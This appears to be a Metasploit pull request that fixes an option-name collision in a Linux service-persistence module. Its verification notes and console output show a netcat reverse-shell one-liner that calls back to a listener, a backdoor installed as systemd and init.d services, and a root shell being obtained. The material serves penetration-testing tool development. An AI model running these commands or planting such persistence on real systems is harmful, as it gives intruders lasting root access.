Fix option collision in service_persistence

[lihe07]

The option SHELLPATH collide with cmd/unix/reverse_netcat, resulting in abnormal backdoors. This PR rename it to BACKDOOR_PATH.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/linux/local/service_persistence
• set payload cmd/unix/reverse_netcat
• Start a handler and a meterpreter session
• set verbose true
• exploit SESSION=<x>
• Before this fix, the generated payload will be like this:
  [+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /tmp >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw
  And after the fix:
  [+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /bin/sh >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw
• Document written

[cdelafuente-r7]

Thanks for fixing this @lihe07 ! Everything looks good to me now. I tested against Ubuntu 20.04.4 and verified the correct path were set. I'll go ahead and land it.

• Example output:

msf6 exploit(linux/local/service_persistence) > run verbose=true session=7 BACKDOOR_PATH=/tmp SHELLPATH=/bin/bash

[+] mkfifo /tmp/ymnda; nc 192.168.128.4 4444 0</tmp/ymnda | /bin/bash >/tmp/ymnda 2>&1; rm /tmp/ymnda
[*] Started reverse TCP handler on 192.168.128.4:4444
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[*] Writing backdoor to /tmp/KovUb
[*] Utilizing systemd
[*] Writing service: /lib/systemd/system/wQrhwGY.service
[*] Enabling service
[*] Starting service
[*] Utilizing System_V
[*] Utilizing update-rc.d
[*] Writing service: /etc/init.d/tJbEXCq
[*] Enabling & starting our service
[*] Command shell session 8 opened (192.168.128.4:4444 -> 192.168.128.4:61858) at 2024-02-14 17:18:12 +0100

id
uid=0(root) gid=0(root) groups=0(root)

[cdelafuente-r7]

Release Notes

This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.